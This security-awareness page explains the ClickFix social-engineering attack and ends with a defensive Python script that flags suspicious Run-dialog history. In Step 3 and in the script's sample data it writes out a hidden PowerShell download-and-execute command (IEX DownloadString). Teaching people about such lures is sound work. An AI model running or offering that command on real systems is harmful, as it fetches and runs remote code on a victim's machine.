How ClickFix Works

ClickFix is a social engineering attack that tricks you into running malicious code on your own computer. Here's exactly how it works, step by step.

Step 1

You Visit a Compromised Website

You might click a link in an email, a search result, or even visit a legitimate website that's been hacked. The page looks normal at first, but then something appears to go wrong.

Common Scenarios:

  • Fake CAPTCHA: "Verify you are human" (often mimics Cloudflare)
  • Browser Update: "Chrome is missing a critical security update"
  • Google Meet/Zoom: "Microphone format not supported - fix to join"
  • FileFix: "Display Error - paste path into File Explorer to fix"
  • ConsentFix: "Verify identity to access document" (OAuth abuse)

Step 2

The Website Presents You Fake "Fix" Instructions

A prompt appears with very specific instructions. It usually says something like:

1. Press the Windows key and R key at the same time

2. Press Ctrl + V to paste

3. Press Enter

Why this is dangerous:

The Win + R combination opens the Windows "Run" dialog, which is a powerful system tool. It can run any program or command on your computer. When you press Ctrl + V, you're pasting a command that the malicious website secretly copied to your clipboard.

Step 3

You Inadvertently Execute a Malicious Command

When you paste and press Enter, you're running a command that looks something like this:

Benign Example (Try running this safely)
powershell -windowstyle hidden -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('https://clickfix.fyi/static/example.ps1')"

What each part does:

  • powershell - Launches PowerShell, a powerful command-line tool built into Windows
  • -windowstyle hidden - Hides the window so you don't see what's happening
  • -ExecutionPolicy Bypass - Bypasses PowerShell's execution policy, the setting that would normally block untrusted scripts from running
  • IEX - Short for "Invoke-Expression" - runs whatever code comes next
  • New-Object Net.WebClient - Creates a tool to download files from the internet
  • DownloadString('hxxps://...') - Downloads a malicious script from the attacker's server as text, which IEX then runs immediately

Step 4

The Malware Runs on Your Computer

The downloaded script typically does one or more of the following:

  • Steals your passwords - Searches your browser's saved passwords and sends them to the attacker
  • Steals your cookies - Takes your login sessions so the attacker can access your accounts
  • Searches for cryptocurrency wallets - Looks for Bitcoin, Ethereum, and other crypto wallet files
  • Takes screenshots - Captures what's on your screen
  • Installs a backdoor - Gives the attacker permanent remote access to your computer

Real Malware Families Distributed via ClickFix:

  • Lumma Stealer - The most common payload in 2025. Steals passwords, session cookies, and crypto wallets.
  • DarkGate - A sophisticated loader used by groups like Storm-0249 to deploy ransomware.
  • AsyncRAT - Open-source remote access tool modified for surveillance.
  • StealC - A lightweight stealer often dropped via "FileFix" lures.

How to Protect Yourself

  1. Never paste commands from websites - No legitimate website will ever ask you to open the Run dialog and paste a command
  2. Be suspicious of "fix" instructions - Real technical problems don't get fixed by pasting mysterious commands
  3. Check the URL - Real Google, Microsoft, or Facebook pages won't show these prompts
  4. When in doubt, close the tab - If something feels off, just close the browser tab and navigate to the site directly
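
For defenders, the parts of the Step 3 command can be turned into a triage check over Run-dialog history, which Windows records under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The Python below is an added example, not code from this site; the sample entries, the example.invalid URL and all function names are constructed for illustration, and it goes beyond the single command above by also matching PowerShell's abbreviated parameter forms such as -w and -ep.

```python
import re

def _param(name, min_len, *aliases):
    """Regex for a PowerShell parameter in full, abbreviated or alias form."""
    forms = [name[:i] for i in range(len(name), min_len - 1, -1)] + list(aliases)
    return r"(?<![\w-])-(?:" + "|".join(forms) + r")\s+['\"]?"

# One indicator per part of the command broken down in Step 3.
INDICATORS = {
    "powershell": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(_param("windowstyle", 1) + r"hidden\b", re.I),
    "policy_bypass": re.compile(_param("executionpolicy", 2, "ep") + r"bypass\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download": re.compile(r"net\.webclient|downloadstring", re.I),
}

def analyze(command):
    """Return the sorted names of the indicators present in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command))

def is_suspicious(command):
    """Flag PowerShell that fetches remote code and also runs or conceals it."""
    hits = set(analyze(command))
    runs_or_hides = hits & {"invoke_expression", "hidden_window", "policy_bypass"}
    return {"powershell", "web_download"} <= hits and bool(runs_or_hides)

# Constructed sample: Run-dialog history in the style of RunMRU values
# (Windows appends "\1" to each entry). The first is the page's benign example.
SAMPLE_RUN_HISTORY = [
    r"""powershell -windowstyle hidden -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('https://clickfix.fyi/static/example.ps1')"\1""",
    r"""PowerShell.exe -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"\1""",
    r"notepad C:\Users\alice\notes.txt\1",
    r"powershell -NoProfile -Command Get-Date\1",
    r"cmd /c ipconfig\1",
]

def triage(history):
    """Return (command, indicators) for every entry worth an analyst's attention."""
    return [(cmd, analyze(cmd)) for cmd in history if is_suspicious(cmd)]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUN_HISTORY):
        print(", ".join(hits), "<-", cmd)
```

A plain PowerShell launch such as the Get-Date entry matches only the "powershell" indicator and is not flagged; the check needs the download together with an execute or conceal indicator.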

See it in Action

Try our safe, interactive demo to see what a ClickFix attack looks like.